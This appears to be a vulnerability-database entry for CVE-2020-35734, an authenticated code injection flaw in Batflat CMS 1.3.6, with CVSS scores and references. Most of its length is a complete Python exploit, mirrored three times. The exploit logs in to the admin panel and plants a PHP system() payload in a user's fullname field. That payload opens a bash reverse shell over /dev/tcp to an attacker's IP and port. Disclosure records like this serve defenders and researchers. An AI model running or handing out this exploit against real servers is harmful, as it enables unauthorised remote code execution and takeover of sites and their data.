Description
** UNSUPPORTED WHEN ASSIGNED ** Sruu.pl in Batflat 1.3.6 allows an authenticated user to perform code injection (and consequently Remote Code Execution) via the input fields of the Users tab. To exploit this, one must log in to the administration panel and edit an arbitrary user's data (username, displayed name, etc.). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
Affected Software
Related
{"id": "CVE-2020-35734", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-35734", "description": "** UNSUPPORTED WHEN ASSIGNED ** Sruu.pl in Batflat 1.3.6 allows an authenticated user to perform code injection (and consequently Remote Code Execution) via the input fields of the Users tab. To exploit this, one must login to the administration panel and edit an arbitrary user's data (username, displayed name, etc.). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.", "published": "2021-02-15T21:15:00", "modified": "2021-07-21T11:39:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-35734", "reporter": "cve@mitre.org", "references": ["https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/", "https://batflat.org/en/changelog", "https://github.com/sruupl/batflat/issues/98", 
"http://packetstormsecurity.com/files/161457/Batflat-CMS-1.3.6-Remote-Code-Execution.html"], "cvelist": ["CVE-2020-35734"], "immutableFields": [], "lastseen": "2022-03-23T17:58:37", "viewCount": 33, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:49573"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161457"]}, {"type": "zdt", "idList": ["1337DAY-ID-35838"]}], "rev": 4}, "score": {"value": 6.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:49573"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161457"]}, {"type": "zdt", "idList": ["1337DAY-ID-35838"]}]}, "exploitation": null, "vulnersScore": 6.1}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:batflat:batflat:1.3.6"], "cpe23": ["cpe:2.3:a:batflat:batflat:1.3.6:*:*:*:*:*:*:*"], "cwe": ["CWE-94"], "affectedSoftware": [{"cpeName": "batflat:batflat", "version": "1.3.6", "operator": "eq", "name": "batflat"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:batflat:batflat:1.3.6:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/", "name": "https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://batflat.org/en/changelog", "name": "https://batflat.org/en/changelog", "refsource": "MISC", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://github.com/sruupl/batflat/issues/98", "name": "https://github.com/sruupl/batflat/issues/98", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": 
"http://packetstormsecurity.com/files/161457/Batflat-CMS-1.3.6-Remote-Code-Execution.html", "name": "http://packetstormsecurity.com/files/161457/Batflat-CMS-1.3.6-Remote-Code-Execution.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"exploitdb": [{"lastseen": "2022-05-13T17:39:46", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-18T00:00:00", "type": "exploitdb", "title": "Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35734"], "modified": "2021-02-18T00:00:00", "id": "EDB-ID:49573", "href": "https://www.exploit-db.com/exploits/49573", "sourceData": "# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)\r\n# Date: 2020-12-27\r\n# Exploit Author: mari0x00\r\n# Vendor Homepage: https://batflat.org/\r\n# Software Link: https://github.com/sruupl/batflat/archive/master.zip\r\n# Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/\r\n# Version: <= 1.3.6\r\n# CVE: CVE-2020-35734\r\n\r\n#!/usr/bin/python3\r\n\r\nimport requests\r\nimport sys\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nfrom termcolor import colored\r\nfrom time import 
sleep\r\n\r\nprint(colored('''###########################################################''',\"red\"))\r\nprint(colored('''####### Batflat authenticated RCE by mari0x00 #######''',\"red\"))\r\nprint(colored('''###########################################################''',\"red\"))\r\nprint(\"\")\r\n\r\nif len(sys.argv) != 6:\r\n print((colored(\"[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>\",\"red\")))\r\n print((colored(\"[~] Default credentials: admin/admin\",\"red\")))\r\n print((colored(\"[~] Example: python3 batpwnd.py http://192.168.101.105/ admin admin 192.168.101.101 4444\",\"red\")))\r\n exit()\r\nurl = sys.argv[1]\r\nusername = sys.argv[2]\r\npassword = sys.argv[3]\r\nIP = sys.argv[4]\r\nPORT = sys.argv[5]\r\n\r\n\r\n#Start session\r\ns = requests.Session()\r\nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}\r\n\r\n\r\n#Authenticate\r\nprint((colored(\"[+] Attempting user login\",\"blue\")))\r\n\r\nlogin_data = {\r\n \"username\": username,\r\n \"password\": password,\r\n \"login\": \"\",\r\n }\r\n\r\nlogin = s.post(url+\"admin/\", login_data, headers=headers)\r\nsleep(0.5)\r\n\r\n#Get token\r\nprint((colored(\"[+] Retrieving the token\",\"blue\")))\r\nr = s.get(url+\"admin/\", headers=headers).content\r\nsoup = BeautifulSoup(r, \"lxml\")\r\ntoken = (re.search(r't=(.*?)\">Add', str(soup)).group(1))\r\nprint((colored(\"[+] Token ID: \" + token,\"blue\")))\r\nsleep(0.5)\r\n\r\n#Get URL\r\nprint((colored(\"[+] Getting the add-user endpoint URL\",\"blue\")))\r\nr = s.get(url+\"admin/users/add?t=\"+token, headers=headers).content\r\nsoup = BeautifulSoup(r, \"lxml\")\r\nadd_user_url = (re.search(r'action=\"(.*?)\"', str(soup)).group(1))\r\nsleep(0.5)\r\n\r\n#Exploit\r\nprint((colored(\"[+] Adding pwnd user\",\"blue\")))\r\npayload = \"<?php system(\\\"/bin/bash -c 'bash -i >& /dev/tcp/\" + IP + \"/\" + PORT + \" 0>&1'\\\");?>\"\r\n\r\nadd_user = {\r\n \"username\": (None, \"pwnd\"),\r\n 
\"fullname\": (None, payload),\r\n \"description\": (None, \"pwnd\"),\r\n \"email\": (None, \"pwnd@evil.com\"),\r\n \"password\": (None, \"pwnd123\"),\r\n \"access[]\": (None, \"users\"),\r\n \"save\": (None, \"Save\")\r\n}\r\n\r\nexploit = s.post(add_user_url, headers=headers, files=add_user)\r\nsleep(0.5)\r\n\r\n#Triggering reverse shell\r\nprint(\"\")\r\nprint((colored(\"[+] Triggering the shell. Go nuts!\",\"green\")))\r\nr = s.get(url+\"admin/users/manage?t=\"+token, headers=headers)", "sourceHref": "https://www.exploit-db.com/download/49573", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-09-01T22:25:19", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-18T00:00:00", "type": "zdt", "title": "Batflat CMS 1.3.6 - Remote Code Execution (Authenticated) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35734"], "modified": "2021-02-18T00:00:00", "id": "1337DAY-ID-35838", "href": "https://0day.today/exploit/description/35838", "sourceData": "# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution 
(Authenticated)\r\n# Exploit Author: mari0x00\r\n# Vendor Homepage: https://batflat.org/\r\n# Software Link: https://github.com/sruupl/batflat/archive/master.zip\r\n# Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/\r\n# Version: <= 1.3.6\r\n# CVE: CVE-2020-35734\r\n\r\n#!/usr/bin/python3\r\n\r\nimport requests\r\nimport sys\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nfrom termcolor import colored\r\nfrom time import sleep\r\n\r\nprint(colored('''###########################################################''',\"red\"))\r\nprint(colored('''####### Batflat authenticated RCE by mari0x00 #######''',\"red\"))\r\nprint(colored('''###########################################################''',\"red\"))\r\nprint(\"\")\r\n\r\nif len(sys.argv) != 6:\r\n print((colored(\"[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>\",\"red\")))\r\n print((colored(\"[~] Default credentials: admin/admin\",\"red\")))\r\n print((colored(\"[~] Example: python3 batpwnd.py http://192.168.101.105/ admin admin 192.168.101.101 4444\",\"red\")))\r\n exit()\r\nurl = sys.argv[1]\r\nusername = sys.argv[2]\r\npassword = sys.argv[3]\r\nIP = sys.argv[4]\r\nPORT = sys.argv[5]\r\n\r\n\r\n#Start session\r\ns = requests.Session()\r\nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}\r\n\r\n\r\n#Authenticate\r\nprint((colored(\"[+] Attempting user login\",\"blue\")))\r\n\r\nlogin_data = {\r\n \"username\": username,\r\n \"password\": password,\r\n \"login\": \"\",\r\n }\r\n\r\nlogin = s.post(url+\"admin/\", login_data, headers=headers)\r\nsleep(0.5)\r\n\r\n#Get token\r\nprint((colored(\"[+] Retrieving the token\",\"blue\")))\r\nr = s.get(url+\"admin/\", headers=headers).content\r\nsoup = BeautifulSoup(r, \"lxml\")\r\ntoken = (re.search(r't=(.*?)\">Add', str(soup)).group(1))\r\nprint((colored(\"[+] Token ID: \" + token,\"blue\")))\r\nsleep(0.5)\r\n\r\n#Get 
URL\r\nprint((colored(\"[+] Getting the add-user endpoint URL\",\"blue\")))\r\nr = s.get(url+\"admin/users/add?t=\"+token, headers=headers).content\r\nsoup = BeautifulSoup(r, \"lxml\")\r\nadd_user_url = (re.search(r'action=\"(.*?)\"', str(soup)).group(1))\r\nsleep(0.5)\r\n\r\n#Exploit\r\nprint((colored(\"[+] Adding pwnd user\",\"blue\")))\r\npayload = \"<?php system(\\\"/bin/bash -c 'bash -i >& /dev/tcp/\" + IP + \"/\" + PORT + \" 0>&1'\\\");?>\"\r\n\r\nadd_user = {\r\n \"username\": (None, \"pwnd\"),\r\n \"fullname\": (None, payload),\r\n \"description\": (None, \"pwnd\"),\r\n \"email\": (None, \"[email\u00a0protected]\"),\r\n \"password\": (None, \"pwnd123\"),\r\n \"access[]\": (None, \"users\"),\r\n \"save\": (None, \"Save\")\r\n}\r\n\r\nexploit = s.post(add_user_url, headers=headers, files=add_user)\r\nsleep(0.5)\r\n\r\n#Triggering reverse shell\r\nprint(\"\")\r\nprint((colored(\"[+] Triggering the shell. Go nuts!\",\"green\")))\r\nr = s.get(url+\"admin/users/manage?t=\"+token, headers=headers)\n\n# 0day.today [2021-09-02] #", "sourceHref": "https://0day.today/exploit/35838", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-02-18T14:21:54", "description": "", "published": "2021-02-18T00:00:00", "type": "packetstorm", "title": "Batflat CMS 1.3.6 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-35734"], "modified": "2021-02-18T00:00:00", "id": "PACKETSTORM:161457", "href": "https://packetstormsecurity.com/files/161457/Batflat-CMS-1.3.6-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution (Authenticated) \n# Date: 2020-12-27 \n# Exploit Author: mari0x00 \n# Vendor Homepage: https://batflat.org/ \n# Software Link: https://github.com/sruupl/batflat/archive/master.zip \n# Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/ \n# Version: <= 1.3.6 \n# CVE: CVE-2020-35734 
\n \n#!/usr/bin/python3 \n \nimport requests \nimport sys \nimport re \nfrom bs4 import BeautifulSoup \nfrom termcolor import colored \nfrom time import sleep \n \nprint(colored('''###########################################################''',\"red\")) \nprint(colored('''####### Batflat authenticated RCE by mari0x00 #######''',\"red\")) \nprint(colored('''###########################################################''',\"red\")) \nprint(\"\") \n \nif len(sys.argv) != 6: \nprint((colored(\"[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>\",\"red\"))) \nprint((colored(\"[~] Default credentials: admin/admin\",\"red\"))) \nprint((colored(\"[~] Example: python3 batpwnd.py http://192.168.101.105/ admin admin 192.168.101.101 4444\",\"red\"))) \nexit() \nurl = sys.argv[1] \nusername = sys.argv[2] \npassword = sys.argv[3] \nIP = sys.argv[4] \nPORT = sys.argv[5] \n \n \n#Start session \ns = requests.Session() \nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} \n \n \n#Authenticate \nprint((colored(\"[+] Attempting user login\",\"blue\"))) \n \nlogin_data = { \n\"username\": username, \n\"password\": password, \n\"login\": \"\", \n} \n \nlogin = s.post(url+\"admin/\", login_data, headers=headers) \nsleep(0.5) \n \n#Get token \nprint((colored(\"[+] Retrieving the token\",\"blue\"))) \nr = s.get(url+\"admin/\", headers=headers).content \nsoup = BeautifulSoup(r, \"lxml\") \ntoken = (re.search(r't=(.*?)\">Add', str(soup)).group(1)) \nprint((colored(\"[+] Token ID: \" + token,\"blue\"))) \nsleep(0.5) \n \n#Get URL \nprint((colored(\"[+] Getting the add-user endpoint URL\",\"blue\"))) \nr = s.get(url+\"admin/users/add?t=\"+token, headers=headers).content \nsoup = BeautifulSoup(r, \"lxml\") \nadd_user_url = (re.search(r'action=\"(.*?)\"', str(soup)).group(1)) \nsleep(0.5) \n \n#Exploit \nprint((colored(\"[+] Adding pwnd user\",\"blue\"))) \npayload = \"<?php system(\\\"/bin/bash -c 'bash -i >& /dev/tcp/\" + IP + 
\"/\" + PORT + \" 0>&1'\\\");?>\" \n \nadd_user = { \n\"username\": (None, \"pwnd\"), \n\"fullname\": (None, payload), \n\"description\": (None, \"pwnd\"), \n\"email\": (None, \"pwnd@evil.com\"), \n\"password\": (None, \"pwnd123\"), \n\"access[]\": (None, \"users\"), \n\"save\": (None, \"Save\") \n} \n \nexploit = s.post(add_user_url, headers=headers, files=add_user) \nsleep(0.5) \n \n#Triggering reverse shell \nprint(\"\") \nprint((colored(\"[+] Triggering the shell. Go nuts!\",\"green\"))) \nr = s.get(url+\"admin/users/manage?t=\"+token, headers=headers) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161457/batflatcms136-exec.txt"}]}